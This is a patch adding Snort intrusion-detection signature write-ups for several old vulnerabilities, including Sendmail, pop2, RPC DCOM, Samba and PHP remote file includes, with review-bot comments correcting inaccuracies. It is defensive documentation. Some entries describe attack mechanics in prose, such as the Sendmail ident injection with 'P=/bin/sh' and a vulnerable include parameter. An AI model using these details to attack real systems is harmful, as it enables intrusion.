+http://www.whitehats.com/info/IDS384
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0651
+
+--
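Review bot: Corrective Action in 607.txt says "Use ssh for remote access instead of rlogin", but the rule and Detailed Information are about "rsh"; say rsh (or "the r-services", which covers both) so the advice matches the event. The entry is also missing the Affected Systems section the other files have; the sentence about UNIX systems that "used to ship with "bin" account enabled and no password required" belongs there. The False Negatives note ("If a local username is not the same as the remote one") would be clearer if it named which username field of the rsh request the rule matches.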
--- /dev/null
+++ b/doc/signatures/542.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+542
+
+--
+Summary:
+This event is generated when activity relating to network chat clients
+is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown
+external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow
+users to transfer files directly between hosts. This can allow malicious
+users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain
+unauthorized access to a host.
+
+This event indicates that an IRC nickname change has been made from a
+client originating from the protected network to an IRC server external
+to the protected network.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party
+using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access
+to a host, then upload a Trojan Horse program to gain control of that
+host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or
+implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+IRC Protocol:
+http://www.irchelp.org/irchelp/rfc/
+
+--
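Review bot: Summary in 542.txt ("activity relating to network chat clients") is far broader than the actual trigger, which Detailed Information only gives in its last paragraph: an IRC nickname change from an internal client to an external IRC server. Lead with that in Summary. Given that trigger, False Positives cannot be "None Known": any user legitimately changing nick on a permitted external IRC server fires the rule, and the entry should say so. Fix "unkown" to "unknown"; the Affected Systems section is also missing.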
--- /dev/null
+++ b/doc/signatures/2952.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2952
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
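Review bot: 2952.txt does not say which share or SMB request the rule matches; "gain access to private or administrative shares on a host" covers every Samba rule in the set. Name the share or request under Summary and Detailed Information, and then False Positives should not be "None known": administrators and backup jobs connect to administrative shares as a matter of course, so the entry should advise excluding known management hosts. Also "adminsitrative" should be "administrative".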
--- /dev/null
+++ b/doc/signatures/100000503.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000503
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Nucleus CMS" application running on a webserver. 
+Access to the file "action.php" using a remote file being passed as the 
+"DIR_LIB" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DIR_LIB" parameter in the "action.php" script used by 
+the "Nucleus CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Nucleus CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000540.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000540
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Enterprise Groupware" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "module" parameter in the "index.php" script 
+used by the "Enterprise Groupware" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Enterprise Groupware
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
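Review bot: Impact and Detailed Information in 100000540.txt overstate a cross-site scripting flaw: "Possible unauthorized administrative access to the server" and "execute system binaries or malicious code of the attackers choosing" describe server-side code execution, which XSS through the "module" parameter of "index.php" does not give. Restate Impact in terms of what XSS actually yields (theft of session cookies or credentials from users who follow the crafted link, and actions performed in their browser in the application's context), which is what the Attack Scenarios paragraph already describes. "Affected Systems: All systems running CGI applications using Enterprise Groupware" should simply be "Systems running Enterprise Groupware".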
--- /dev/null
+++ b/doc/signatures/1031.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1031
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
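Review bot: 1031.txt gives no indication of which IIS vulnerability SID 1031 detects; "Many known vulnerabilities exist for this platform and the attack scenarios are legion" is true of every IIS rule and leaves the analyst nothing to check against the request that fired. Name the URI or request the rule matches, put the matching Microsoft bulletin or CVE under Additional References (currently empty), and narrow "All systems running Microsoft IIS" to the affected IIS versions.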
--- /dev/null
+++ b/doc/signatures/1224.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1224
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
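Review bot: Detailed Information never says what SID 1224 actually matches (which URI, CGI or content string), so an analyst cannot tell a real hit from noise; "Many known vulnerabilities exist for each implementation and the attack scenarios are legion." describes web servers in general, not this rule. State the specific request pattern the signature keys on and scope Affected Systems to the product concerned instead of "All systems using a web server." For a broad web-content match "False Positives: None known." is not credible; note that legitimate requests containing the same string will fire it. Additional References is empty; add the advisory for the vulnerability the Summary calls "known".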
--- /dev/null
+++ b/doc/signatures/284.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 
+284
+
+--
+Summary:
+This event generated when an attempt is made to exploit a buffer overflow in the pop2 service.
+
+--
+Impact: 
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable host with the privileges of the user "nobody".
+
+--
+Detailed Information:
+Access to the user "nobody" can be obtained with pop2 or pop3 servers that support "anonymous proxy".  "Anonymous proxy" permits the use of a proxy pop server to access mail on another pop server where the user has a valid account.  This access to the proxy server as user "nobody".  A buffer overflow exists because of improper user input filtering, allowing the attacker to enter an overly long argment to the FOLD command.  This may permit the execution of arbitrary commands on the vulernable server with the privileges of the user "nobody".
+
+--
+Affected Systems:
+Debian Linux 2.1
+Redhat Linux 4.2, 5.0, 5.1, and 5.2
+University of Washington imap 4.4
+University of Washington pop2d 4.4
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable pop2 server, permitting the execution of arbitrary commands with the privilege of user "nobody". 
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the pop2d version 4.51 or later. 
+
+Compile pop2d to not support anonymous proxing.
+
+--
+Contributors:
+Original rule writer unknown
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/283
+
+--
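Review bot: the Detailed Information paragraph contains a sentence with no verb, "This access to the proxy server as user "nobody"." (presumably "This access is made to the proxy server as user "nobody"."), plus three typos: "argment" (argument), "vulernable" (vulnerable) and, in Corrective Action, "proxing" (proxying). The entry should also say which port the rule watches: the Summary says pop2 (109/tcp) but Detailed Information says the anonymous proxy feature exists in "pop2 or pop3 servers", so state whether 110/tcp is covered by this signature or by a separate one.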
--- /dev/null
+++ b/doc/signatures/100000760.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000760
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "The Banner Engine" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "text" parameter in the "top.php" script used by the "The Banner Engine" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using The Banner Engine
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
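Review bot: Impact and the second Detailed Information paragraph describe server-side consequences ("unauthorized administrative access to the server", "execute system binaries or malicious code") for what the Summary says is a cross site scripting bug in the "text" parameter of top.php; XSS runs script in a visitor's browser, so the realistic impact is session or cookie theft and content injection against users of the site, not code execution on the webserver. Rewrite Impact to say that and drop the pasted CGI boilerplate. False Positives should also mention that any legitimate request carrying markup-like content in the "text" parameter will match. Minor: the "Sid:" block lacks the blank line before "--" that the other entries use.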
--- /dev/null
+++ b/doc/signatures/1396.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1396
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
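Review bot: this entry never names the CGI script or URI that SID 1396 matches; everything from Detailed Information through Attack Scenarios is generic text about CGI applications and credential checks, so a reader learns nothing about this particular signature. Add the matched request path, a version range under Affected Systems (currently "All systems running CGI applications"), and a reference. Typo in Detailed Information: "ona web server" should be "on a web server".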
--- /dev/null
+++ b/doc/signatures/668.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+668
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a vulnerability in Sendmail, where tab characters in ident messages are not properly parsed.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Sendmail 8.6.10 and earlier versions contain a vulnerability related to the parsing of tab characters in commands passed from ident to Sendmail. An attacker can use a specially crafted command with tabs in an ident response to Sendmail. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. 
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email with tab characters and includes a path variable of P=/bin/sh. Directives included in the transmission are executed while the message remains in the Sendmail queue.
+
+--
+Ease of Attack:
+Moderate. Multiple exploits exist, but the window of opportunity is small; the vulnerability must be exploited while the message is queued for delivery and must have sufficient time (the mail server must be busy/slow) to execute the commands.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
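Review bot: Attack Scenarios contradicts Detailed Information about where the malicious data comes from: Detailed Information says the crafted data arrives in the ident response that Sendmail requests, while Attack Scenarios says "An attacker sends an email with tab characters". Reconcile the two, because it matters for sensor placement: if the injection is in the ident reply, the traffic to inspect is the response on the ident connection (113/tcp) coming back from the attacker's host, not the SMTP session. Also confirm that the cited CVE-1999-0203 and BID 2311 both describe the ident tab-parsing issue in the Summary and not an adjacent Sendmail bug; the two references should agree with each other and with the text.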
--- /dev/null
+++ b/doc/signatures/1869.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1869
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
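Review bot: Detailed Information, Affected Systems and Attack Scenarios here are word for word the text used for 1396.txt earlier in this patch, including the "ona web server" typo, and nothing identifies what SID 1869 looks for. Each entry should at least carry the script name or URI the rule matches and a reference; otherwise the two documents are indistinguishable and neither helps an analyst decide whether a hit matters.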
--- /dev/null
+++ b/doc/signatures/2144.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2144
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the cafelog php application. 
+
+--
+Impact:
+Possible arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the cafelog PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL, the script is processed and executed with the privileges of the user running the webserver. This is due to poor checking of user supplied variables in the gm-2-b2.php script.
+
+--
+Affected Systems:
+Any host using cafelog.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script via gm-2-b2.php.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
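Review bot: Corrective Action "Check the php implementation on the host." is too vague to act on; since the bug is remote inclusion of a URL-supplied file via gm-2-b2.php, say what to check: upgrade cafelog to a fixed release, and on the PHP side disable remote includes (allow_url_fopen = Off, and allow_url_include = Off on PHP 5.2 and later) so that include() cannot fetch attacker-hosted code. Affected Systems "Any host using cafelog." should give the affected versions, and Additional References is empty. Minor: "Sid: 2144" sits on one line here while every other entry puts the number on its own line.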
--- /dev/null
+++ b/doc/signatures/100000444.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000444
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiraksGalerie" application running on a webserver. Access to the file "galsecurity.lib.php" using a remote file being passed as the "listconfigfile[0]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "listconfigfile[0]" parameter in the "galsecurity.lib.php" script used by the "MiraksGalerie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiraksGalerie
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
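Review bot: the third Detailed Information paragraph and the Attack Scenarios section are credential-check boilerplate ("access an authentication mechanism and supply his/her own credentials") that has nothing to do with the remote file include in galsecurity.lib.php described in the Summary; replace them with the actual scenario, an attacker supplying a URL to attacker-hosted PHP in listconfigfile[0] that the script includes and executes with the webserver's privileges. Also worth a line under False Negatives: the parameter name contains square brackets, which clients frequently send URL-encoded (listconfigfile%5B0%5D), so state whether the signature depends on the HTTP preprocessor's URI normalization to catch that form.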
--- /dev/null
+++ b/doc/signatures/3203.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3203
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
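Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") reads like an SMB attack and does not match Detailed Information, which says the overflow is triggered by "a malformed request to an RPC port"; rewrite the scenario so the overly long name is described as carried inside the DCOM request over RPC, which is also why Corrective Action lists RPC ports. Consider adding 593/tcp (RPC over HTTP) to the blocked ports. Additional References is empty for a "known vulnerability"; add the Microsoft bulletin and CVE. Typo in Ease of Attack: "Expoit" should be "Exploit".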
--- /dev/null
+++ b/doc/signatures/3033.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3033
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
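Review bot: Additional References is empty although Affected Systems pins the bug to "Samba 3.0.8 and prior"; a version that specific came from an advisory, so cite the CVE and the Samba security release so readers can check the first fixed version. Detailed Information says code runs "with the privileges of the user running the smbd process"; on a stock installation that is root, so say so in Impact rather than leaving the reader to infer it. Formatting: missing space in "remote server.The problem".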
--- /dev/null
+++ b/doc/signatures/2264.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2264
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
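Review bot: Affected Systems ("All systems using Sendmail.") contradicts Detailed Information, which scopes the prescan() bug to Sendmail prior to 8.12.9; bound Affected Systems to those versions (and vendor builds that have not backported the fix) so that sites on 8.12.9 or later can deprioritise the event. Corrective Action "Upgrade Sendmail to the latest non-affected verison." should name 8.12.9 as the first fixed release, and "verison" is a typo. Attack Scenarios presents "open a listening shell bound to a high port" as the outcome; that is one payload choice, not a property of the vulnerability, so phrase it as an example.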
--- /dev/null
+++ b/doc/signatures/1136.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1136
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
